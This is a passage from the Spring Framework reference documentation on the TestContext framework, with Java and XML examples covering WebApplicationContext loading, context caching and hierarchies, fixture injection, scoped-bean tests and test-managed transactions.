{\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. 
You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. 
`ServletTestExecutionListener` also ensures that the
`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test
instance, and once the test is complete it cleans up thread-local state.

Once you have a `WebApplicationContext` loaded for your test, you might find that you
need to interact with the web mocks -- for example, to set up your test fixture or to
perform assertions after invoking your web component. The following example demonstrates
which mocks can be autowired into your test instance. Note that the
`WebApplicationContext` and `MockServletContext` are both cached across the test suite;
whereas, the other mocks are managed per test method by the
`ServletTestExecutionListener`.

.Injecting mocks
[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@WebAppConfiguration
	@ContextConfiguration
	public class WacTests {

		@Autowired
		WebApplicationContext wac; // cached

		@Autowired
		MockServletContext servletContext; // cached

		@Autowired
		MockHttpSession session;

		@Autowired
		MockHttpServletRequest request;

		@Autowired
		MockHttpServletResponse response;

		@Autowired
		ServletWebRequest webRequest;

		//...
	}
----
--

[[testcontext-ctx-management-caching]]
===== Context caching

Once the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)
for a test, that context will be cached and reused for __all__ subsequent tests that
declare the same unique context configuration within the same test suite. To understand
how caching works, it is important to understand what is meant by __unique__ and __test
suite__.

An `ApplicationContext` can be __uniquely__ identified by the combination of
configuration parameters that are used to load it. Consequently, the unique combination
of configuration parameters is used to generate a __key__ under which the context is
cached. The TestContext framework uses the following configuration parameters to build
the context cache key:

* `locations` __(from @ContextConfiguration)__
* `classes` __(from @ContextConfiguration)__
* `contextInitializerClasses` __(from @ContextConfiguration)__
* `contextCustomizers` __(from ContextCustomizerFactory)__
* `contextLoader` __(from @ContextConfiguration)__
* `parent` __(from @ContextHierarchy)__
* `activeProfiles` __(from @ActiveProfiles)__
* `propertySourceLocations` __(from @TestPropertySource)__
* `propertySourceProperties` __(from @TestPropertySource)__
* `resourceBasePath` __(from @WebAppConfiguration)__

For example, if `TestClassA` specifies `{"app-config.xml", "test-config.xml"}` for the
`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework
will load the corresponding `ApplicationContext` and store it in a `static` context cache
under a key that is based solely on those locations. So if `TestClassB` also defines
`{"app-config.xml", "test-config.xml"}` for its locations (either explicitly or
implicitly through inheritance) but does not define `@WebAppConfiguration`, a different
`ContextLoader`, different active profiles, different context initializers, different
test property sources, or a different parent context, then the same `ApplicationContext`
will be shared by both test classes.
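To make this concrete, the following sketch (class bodies elided, file names taken from
the scenario just described) shows two test classes whose identical configuration yields
a single cached context:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassA {
		// ...
	}

	@RunWith(SpringRunner.class)
	// same locations, loader, profiles, etc., so the ApplicationContext
	// cached for TestClassA is reused instead of being loaded again
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassB {
		// ...
	}
----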
This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ++ApplicationContext++s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. 
Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit-based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. 
The result is
that three application contexts will be loaded (one for each declaration of
`@ContextConfiguration`), and the application context loaded based on the configuration
in `AbstractWebTests` will be set as the parent context for each of the contexts loaded
for the concrete subclasses.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("file:src/main/webapp/WEB-INF/applicationContext.xml")
	public abstract class AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/soap-ws-config.xml"))
	public class SoapWebServiceTests extends AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/rest-ws-config.xml"))
	public class RestWebServiceTests extends AbstractWebTests {}
----
--


.Class hierarchy with merged context hierarchy configuration
--
The following classes demonstrate the use of __named__ hierarchy levels in order to
__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`
defines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends
`BaseTests` and instructs the Spring TestContext Framework to merge the context
configuration for the `child` hierarchy level, simply by ensuring that the names
declared via the `name` attribute in `@ContextConfiguration` are both `"child"`. The
result is that three application contexts will be loaded: one for `"/app-config.xml"`,
one for `"/user-config.xml"`, and one for `{"/user-config.xml", "/order-config.xml"}`.
As with the previous example, the application context loaded from `"/app-config.xml"`
will be set as the parent context for the contexts loaded from `"/user-config.xml"`
and `{"/user-config.xml", "/order-config.xml"}`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextHierarchy({
		@ContextConfiguration(name = "parent", locations = "/app-config.xml"),
		@ContextConfiguration(name = "child", locations = "/user-config.xml")
	})
	public class BaseTests {}

	@ContextHierarchy(
		@ContextConfiguration(name = "child", locations = "/order-config.xml")
	)
	public class ExtendedTests extends BaseTests {}
----
--

.Class hierarchy with overridden context hierarchy configuration
--
In contrast to the previous example, this example demonstrates how to __override__ the
configuration for a given named level in a context hierarchy by setting the
`inheritLocations` flag in `@ContextConfiguration` to `false`.
Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit. 
The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit-based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. 
In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring since the early years, and since Spring 3.2 it's a breeze to test your\nrequest-scoped and session-scoped beans by following these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). 
We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). 
Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia the `@Commit` and 
`@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured not to roll back the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in your test class with one of these annotations, and the\n`TransactionalTestExecutionListener` ensures that your __before transaction method__ or\n__after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit's `@Before`) and any __after\nmethods__ (such as methods annotated with JUnit's `@After`) are executed __within__ a\ntransaction. In addition, methods annotated with `@BeforeTransaction` or\n`@AfterTransaction` are naturally not executed for test methods that are not configured\nto run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring 